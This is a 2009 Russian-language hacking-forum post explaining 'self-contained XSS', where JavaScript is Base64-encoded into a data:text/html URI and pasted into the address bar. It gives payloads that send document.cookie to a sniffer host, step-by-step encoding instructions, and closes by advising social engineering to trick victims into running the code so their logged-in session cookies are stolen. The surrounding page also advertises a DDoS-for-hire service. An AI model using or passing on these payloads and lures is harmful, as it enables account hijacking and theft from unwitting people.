Самодостаточная XSS(Self-contained XSS) - Proxy-Base Community - Анонимность и безопасность в интернете.
Бесплатные прокси. Количество:
Прокси для пользователей форума (API). Количество:
Купить доступ к прокси-листам (API). Количество:
 



Информация по хайдам / репутации

(РЕКОМЕНДУЮ) №1 >>>DDos Атака<<|>>DDoS Service<<< ДДОС СЕРВИС<<|>>Заказать DDOS
Бесплатные прокси уже в Telegram
Все инфопродукты и приватная информация бесплатно
Старый 24.12.2009, 20:39   #1 (permalink)
Заблокирован
 
Регистрация: 06.06.2009
Адрес: ip: 178.65.158.19, 95.52.11.251, 95.54.190.39, 78.36.31.7
Сообщений: 97
Member ID: 511
ICQ 448354

Репутация: 200
Репутация: 200
Сказал(а) спасибо: 155
Поблагодарили 180 раз(а) в 69 сообщениях
Топикстартер (автор темы) Круто Самодостаточная XSS(Self-contained XSS)

Попытаюсь объяснить как можно понятней. Эта статья не о снифферах или XSS, об этом вы можете прочитать в других статьях. Рекомендую перед прочтением этой статьи ознакомиться с простыми XSS и снифферами.

Что же такое самодостаточная XSS.

Это XSS атака, которой не требуется XSS уязвимость в Веб приложениях(сайтах проще говоря). Это код javascript закодированный в Base64 кодировку, и правильно переданный браузеру(программе с которой вы просматриваете сайты). Я покажу как это всё делать поэтапно, так-что если чего-то не поняли сейчас, не пугайтесь.

Итак, что же нам нужно для проведения такова типа атаки(на себе):
1. веб браузер(firefox, opera, IE8 и выше, и другие браузеры)
2. программа, либо скрипт, который кодирует текст в Base64(Скрипт онлайн)
3. код для обращения к браузеру(data:text/html;base64,)
4. онлайн сниффер для получения куков

Шаг1. Пишем javascript для атаки.

Итак, покажу 2 примера для javascript.

Пример 1. Вызов сообщения с текстом.
Сам скрипт
Код:
<script>alert('XSS')</script> (текст)
Код:
<script>alert(document.cookie)</script> (сообщение с куками)
Пример 2. Отправка куков на сниффер.
Скрипт
Код:
<sсriрt>img = new Image(); img.src = "http://page.com/sniffer.php?"+document.cookie;</sсriрt>
либо если у вас сниффер с картинкой

Код:
<sсriрt>img = new Image(); img.src = "http://page.com/pic.jpg?"+document.cookie;</sсriрt>
Шаг2. Кодируем и добавляем спец. код.

1. Заходим на онлайн кодировщик(выше есть линк)
2. Вписываем в поле для текста скрипт <script>alert('XSS')</script> и жмём кнопку чтоб закодировать, получаем PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
3. Добавляем код(data:text/html;base64,) в начало закодированного скрипта, получаем data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8 L3NjcmlwdD4=

Шаг 3. Последний, выполняем атаку.

Теперь для проведения атаки нам нужно поместить наш закодированный скрипт с кодом в адресную строку браузера(туда где пишем google.com и т.д., при этом http:// стираем тоже, вписываем всё в пустую строку. Попробуйте вписать туда data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8 L3NjcmlwdD4= и выскочит сообщение "XSS". Для получение куков при такой атаке должен быть открыт сайт и подключён пользователь, с которого хотим получить куки, т.е. к примеру зайти на вконтакт и подключиться, и тогда только вводить наш код.

Замечание.
Это всё было проведено на нашем компьютере. Если вы хотите провести атаку на другом человеке, то пользуйтесь социальной инженерией и заставьте человека ввести ваш код в адресную строку.

(с) 0x00

Автор
aston вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Вкл.





DDoS Protected




Мы в твиттере, Proxy-Base.Org Twitter

Proxy-Base Community - Анонимность и безопасность в интернете.
Наши партнеры: CRC Labs, SEO-Crack.Com, Garsuk.Com, SED Team, Skladchik.com, BSS Family

Powered by vBulletin® | Булка сделана в пекарне®
Copyright © 2000 - , Jelsoft Enterprises Ltd. Перевод: zCarot
Вся информация на сайте выложена исключительно в ознакомительных целях.